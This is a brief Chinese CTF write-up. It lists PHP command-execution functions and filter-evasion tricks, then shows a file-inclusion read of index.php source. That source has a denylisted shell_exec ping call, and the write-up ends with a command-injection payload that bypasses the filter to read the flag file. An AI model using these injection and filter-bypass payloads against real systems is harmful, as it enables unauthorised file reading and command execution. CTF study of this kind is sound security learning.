命令执行常用到的函数
- system() :有回显
- passthru()
- shell_exec()
- `` :无回显
cat 替换
- nl
- more
- tac
- less
小技巧
我们可以用 %09,${IFS}代替空格 ,当flag 被过滤时可以用 正则表达式来代替
端午就该吃粽子
回到题目 发现zhongzi参数可空 -> 文件包含漏洞
直接用伪协议php://filter/read=convert.base64-encode/resource=index.php
得到
<?php
error_reporting(0);
if (isset($_GET['url'])) {
$ip=$_GET['url'];
if(preg_match("/(;|'| |>|]|&| |python|sh|nc|tac|rev|more|tailf|index|php|head|nl|sort|less|cat|ruby|perl|bash|rm|cp|mv|\*)/i", $ip)){
die("<script language='javascript' type='text/javascript'>
alert('no no no!')
window.location.href='index.php';</script");
}else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("<script language='javascript' type='text/javascript'>
alert('no flag!')
window.location.href='index.php';</script>");
}
$a = shell_exec("ping -c 4 ".$ip);
echo $a;
}
?url=127.0.0.1|c\a\t${IFS}/????
直接看到最后一句那里,命令执行漏洞
对应上文所讲知识: cat 被过滤可以用 c\a\t ,flag被过滤对应正则??? 空格被过滤可以用%09 或者 ${IFS} 最终pyload为
?url=127.0.0.1|c\a\t${IFS}/???